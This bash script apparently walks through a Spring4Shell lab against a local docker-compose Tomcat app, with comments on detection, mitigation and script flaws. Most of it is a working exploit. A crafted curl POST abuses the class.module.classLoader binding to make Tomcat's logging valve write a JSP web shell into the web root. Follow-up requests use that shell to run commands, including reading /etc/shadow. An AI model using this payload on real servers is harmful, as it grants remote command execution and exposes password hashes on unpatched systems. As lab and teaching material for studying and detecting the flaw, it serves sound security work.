#!/usr/bin/env bash
# Lab walkthrough of Spring4Shell against a local docker-compose target.
# Flow: bring up the compose stack, send one crafted POST to the greeting
# endpoint, check that a JSP appeared under webapps/ROOT, request it, tear down.
#
# Script hygiene notes for anyone reusing the harness: there is no
# `set -euo pipefail` and no readiness probe -- both waits are a fixed
# `sleep 10`, so on a slow host the curl calls can run before Tomcat listens
# and the "after exploit" listing will be misleading. All diagnostics go to
# stdout rather than stderr.
echo "[+] Starting Tomcat 9.0 server with Spring Boot application vulnerable to Spring4Shell..."
# Compose file is not part of this listing; the service is referred to as `app` below.
docker-compose up -d
echo "[+] Waiting 10 seconds for server to start..."
sleep 10
# Baseline listing so the dropped file is visible as a diff afterwards.
echo "[SERVER][+] webapps/ROOT dir before exploit"
docker-compose exec app ls webapps/ROOT
echo
echo "[+] Exploiting Spring4Shell vulnerability in server: http://localhost:8080/helloworld/greeting"
# The single exploit request. Every form field starts with
# class.module.classLoader.resources.context.parent.pipeline.first.*, i.e. the
# data binder is walked from the bound object's Class, through its ClassLoader,
# into the Tomcat context's first pipeline valve, and that valve's
# pattern / suffix / directory / prefix / fileDateFormat attributes are set so
# it writes a file named shell.jsp into webapps/ROOT (this is the access-log
# valve's attribute set -- confirm against the Tomcat docs). The `prefix`,
# `suffix` and `c` request headers are pulled into the pattern as
# %{prefix}i / %{c}i / %{suffix}i (URL-encoded below as %25%7B...%7Di), so the
# literal "<%", "%>" and "Runtime" never appear in the request body;
# fileDateFormat is emptied so the output filename has no date component.
# Detection: a POST whose parameter names contain "class.module.classLoader"
# plus unusual prefix/suffix/c headers; on the host, a new .jsp under
# webapps/ROOT. Mitigation: a Spring Framework release with the binder fix, or
# a WebDataBinder disallowed-fields rule covering class.* / Class.* paths;
# the technique also depends on the WAR-on-Tomcat deployment used in this lab.
curl -H "prefix:<%" -H "suffix:%>//" -H "c:Runtime" -H "Content-Type: application/x-www-form-urlencoded" -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" http://localhost:8080/helloworld/greeting
echo
echo
# The artifact to look for on a compromised host: shell.jsp in the web root.
echo "[SERVER][+] webapps/ROOT dir after exploit, should include shell.jsp"
docker-compose exec app ls webapps/ROOT
echo
echo "[+] Shell is now accessible at: http://localhost:8080/shell.jsp?cmd=<cmd>"
echo "[+] Waiting 10 seconds..."
sleep 10
echo "[+] Running command: http://localhost:8080/shell.jsp?cmd=id"
# Unquoted URL: '?' is a glob character, so this only works because no file in
# the current directory matches; the two calls below quote the URL correctly.
curl --output - http://localhost:8080/shell.jsp?cmd=id
echo
echo "[+] Running command: http://localhost:8080/shell.jsp?cmd=cat /etc/shadow"
# If this prints hashes, the servlet container can read root-only files, i.e.
# it is not running as a least-privilege user -- the lab's own illustration of
# blast radius; a dedicated non-root service account would limit it.
curl --output - "http://localhost:8080/shell.jsp?cmd=cat%20/etc/shadow"
echo
echo "[+] Running command: http://localhost:8080/shell.jsp?cmd=cat /flag"
curl --output - "http://localhost:8080/shell.jsp?cmd=cat%20/flag"
echo
# Teardown always runs (no set -e) but is not in a trap, so an interrupted run
# leaves the stack -- including the dropped shell.jsp -- in place.
docker-compose kill && docker-compose rm -f